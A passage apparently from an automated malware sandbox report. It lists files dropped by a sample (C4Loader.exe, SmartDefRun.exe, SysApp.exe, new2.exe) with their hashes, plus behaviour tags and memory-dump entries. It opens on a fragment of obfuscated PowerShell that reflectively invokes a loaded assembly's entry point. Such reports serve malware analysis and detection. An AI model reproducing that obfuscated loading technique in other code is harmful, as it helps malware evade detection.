+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+'le'+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fcf0e698-f5b9-4a35-8f7c-433f51a62e26}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD539924b7dcecec33d208224b7df8e78f0
SHA112d9189b6bf68e9ffd8e393a5ab7a66fd9c02db5
SHA256bdb86940389898e4feebf16c139b864aad8b1135838df6bb8c23d4871bab1d69
SHA512dfd3e4681b9bc07d8a6e5a7deb0641b738edf96e78c14cf60ca3052f260c9c47cd1ee7c8ad2cd973de026e5cb5d5eb00bd14a4eeab3c6e629d275056c66f2bee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD539924b7dcecec33d208224b7df8e78f0
SHA112d9189b6bf68e9ffd8e393a5ab7a66fd9c02db5
SHA256bdb86940389898e4feebf16c139b864aad8b1135838df6bb8c23d4871bab1d69
SHA512dfd3e4681b9bc07d8a6e5a7deb0641b738edf96e78c14cf60ca3052f260c9c47cd1ee7c8ad2cd973de026e5cb5d5eb00bd14a4eeab3c6e629d275056c66f2bee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD5851e5e6ac1908dfc3678c207428f5ff8
SHA19449ee859db67dc092fd0a12250034d93a87d648
SHA25692c4e1f58b5e35e51908dd00b2fe4fa46e18315fd4fce65faf554d9842602ea9
SHA51223b34cec921f01a9e895c5af8c6c683a2a13ab957c4325b11f9ddaa1e4df417dad388367f45a5e409569017193a6f42ece54efe462164868b6ee03fa34631c94
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c697637a9b17f577fccd7e83a5495810
SHA104e6054584786b88994b0e0a871562227fe2a435
SHA25654992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
SHA51266f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaLFilesize
2KB
MD5dce9b749d38fdc247ab517e8a76e6102
SHA1d6c5b6548e1a3da3326bd097c50c49fc7906be3f
SHA2565087b8c7f2cecceac61d7bd02b939888cf2cc5a452676f28fd5c076eb1ae7ea7
SHA51256c276f0a070da656c98520aa720994d78f1bf0bbb085a5f6fb4fd18fed2bbba1eb8e97b54d58eaa9a978d21d64678170f49c020feb19d8545d158a2d8d58446
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tioncbhx.u1z.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPjFilesize
71KB
MD592d24961d2ebaacf1ace5463dfc9930d
SHA199ffaf6904ab616c33a37ce01d383e4a493df335
SHA2569013688dec264c615178e151c2eb5f0b2eb9fe8cfad867b311d8581d921c73f3
SHA51277598c77f219ab5234b8b84bcfe873f40e7464b224fac3c8568b300d3f2563f7ef5ad9ec5cccc0d719e7d3e489a164b04b6b36316196afea0b8051de3c751cc7
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\Desktop\C4Loader.exeFilesize
687.8MB
MD566a41bcddbef0ad226adda334fc38ae6
SHA13128d77a2d71d1fc520d302f2d6a12f0c3c47a09
SHA25636f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
SHA512541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
-
C:\Users\Admin\Desktop\C4Loader.exeFilesize
687.8MB
MD566a41bcddbef0ad226adda334fc38ae6
SHA13128d77a2d71d1fc520d302f2d6a12f0c3c47a09
SHA25636f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
SHA512541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
-
memory/60-392-0x0000028CE4250000-0x0000028CE4260000-memory.dmpFilesize
64KB
-
memory/60-393-0x0000028CE4250000-0x0000028CE4260000-memory.dmpFilesize
64KB
-
memory/60-395-0x0000028CE4250000-0x0000028CE4260000-memory.dmpFilesize
64KB
-
memory/60-397-0x00007FFA99030000-0x00007FFA99225000-memory.dmpFilesize
2.0MB
-
memory/60-398-0x00007FFA97080000-0x00007FFA9713E000-memory.dmpFilesize
760KB
-
memory/432-241-0x0000000005380000-0x000000000538A000-memory.dmpFilesize
40KB
-
memory/432-247-0x00000000050D0000-0x00000000050E0000-memory.dmpFilesize
64KB
-
memory/432-245-0x00000000050D0000-0x00000000050E0000-memory.dmpFilesize
64KB
-
memory/432-237-0x0000000004F90000-0x0000000005022000-memory.dmpFilesize
584KB
-
memory/432-229-0x0000000000540000-0x00000000006AC000-memory.dmpFilesize
1.4MB
-
memory/432-263-0x00000000050D0000-0x00000000050E0000-memory.dmpFilesize
64KB
-
memory/1120-356-0x00007FF614E80000-0x00007FF615240000-memory.dmpFilesize
3.8MB
-
memory/1120-372-0x00007FF614E80000-0x00007FF615240000-memory.dmpFilesize
3.8MB
-
memory/1120-262-0x00007FF614E80000-0x00007FF615240000-memory.dmpFilesize
3.8MB
-
memory/1144-365-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-359-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-357-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-358-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-360-0x00007FF46C4F0000-0x00007FF46C500000-memory.dmpFilesize
64KB
-
memory/1144-364-0x000001C26B290000-0x000001C26B2A0000-memory.dmpFilesize
64KB
-
memory/1144-367-0x000001C26A7C0000-0x000001C26B281000-memory.dmpFilesize
10.8MB
-
memory/2412-175-0x0000000006850000-0x0000000006882000-memory.dmpFilesize
200KB
-
memory/2412-195-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-174-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-176-0x0000000074920000-0x000000007496C000-memory.dmpFilesize
304KB
-
memory/2412-186-0x0000000006820000-0x000000000683E000-memory.dmpFilesize
120KB
-
memory/2412-173-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-187-0x000000007FA80000-0x000000007FA90000-memory.dmpFilesize
64KB
-
memory/2412-188-0x0000000007BE0000-0x000000000825A000-memory.dmpFilesize
6.5MB
-
memory/2412-155-0x0000000002CC0000-0x0000000002CF6000-memory.dmpFilesize
216KB
-
memory/2412-172-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-171-0x0000000005540000-0x000000000555E000-memory.dmpFilesize
120KB
-
memory/2412-156-0x00000000055C0000-0x0000000005BE8000-memory.dmpFilesize
6.2MB
-
memory/2412-157-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-159-0x00000000052D0000-0x00000000052F2000-memory.dmpFilesize
136KB
-
memory/2412-196-0x0000000007930000-0x0000000007952000-memory.dmpFilesize
136KB
-
memory/2412-158-0x0000000004F80000-0x0000000004F90000-memory.dmpFilesize
64KB
-
memory/2412-197-0x000000007FA80000-0x000000007FA90000-memory.dmpFilesize
64KB
-
memory/2412-161-0x0000000005C60000-0x0000000005CC6000-memory.dmpFilesize
408KB
-
memory/2412-198-0x0000000008810000-0x0000000008DB4000-memory.dmpFilesize
5.6MB
-
memory/2412-194-0x0000000007810000-0x0000000007818000-memory.dmpFilesize
32KB
-
memory/2412-193-0x0000000007820000-0x000000000783A000-memory.dmpFilesize
104KB
-
memory/2412-192-0x00000000077D0000-0x00000000077DE000-memory.dmpFilesize
56KB
-
memory/2412-191-0x0000000007840000-0x00000000078D6000-memory.dmpFilesize
600KB
-
memory/2412-190-0x0000000007610000-0x000000000761A000-memory.dmpFilesize
40KB
-
memory/2412-189-0x00000000075A0000-0x00000000075BA000-memory.dmpFilesize
104KB
-
memory/2412-160-0x0000000005BF0000-0x0000000005C56000-memory.dmpFilesize
408KB
-
memory/2696-373-0x00007FF6E2D40000-0x00007FF6E2D69000-memory.dmpFilesize
164KB
-
memory/3208-148-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/3208-154-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/3572-394-0x0000000003A80000-0x0000000003A90000-memory.dmpFilesize
64KB
-
memory/3572-396-0x0000000003A80000-0x0000000003A90000-memory.dmpFilesize
64KB
-
memory/3668-320-0x000001A33EC80000-0x000001A33EC9A000-memory.dmpFilesize
104KB
-
memory/3668-321-0x000001A33EC30000-0x000001A33EC38000-memory.dmpFilesize
32KB
-
memory/3668-319-0x000001A33EC20000-0x000001A33EC2A000-memory.dmpFilesize
40KB
-
memory/3668-304-0x000001A33EC40000-0x000001A33EC5C000-memory.dmpFilesize
112KB
-
memory/3668-303-0x000001A33EC10000-0x000001A33EC1A000-memory.dmpFilesize
40KB
-
memory/3668-302-0x000001A33EBF0000-0x000001A33EC0C000-memory.dmpFilesize
112KB
-
memory/3668-285-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-284-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-283-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-327-0x000001A33E9C0000-0x000001A33E9D0000-memory.dmpFilesize
64KB
-
memory/3668-271-0x000001A33EA70000-0x000001A33EA92000-memory.dmpFilesize
136KB
-
memory/3668-322-0x000001A33EC60000-0x000001A33EC66000-memory.dmpFilesize
24KB
-
memory/3668-323-0x000001A33EC70000-0x000001A33EC7A000-memory.dmpFilesize
40KB
-
memory/3668-326-0x000001A3258E0000-0x000001A3263A1000-memory.dmpFilesize
10.8MB
-
memory/5048-399-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/5048-403-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/5048-406-0x00007FFA99030000-0x00007FFA99225000-memory.dmpFilesize
2.0MB
-
memory/5048-407-0x00007FFA97080000-0x00007FFA9713E000-memory.dmpFilesize
760KB
-
memory/5048-408-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB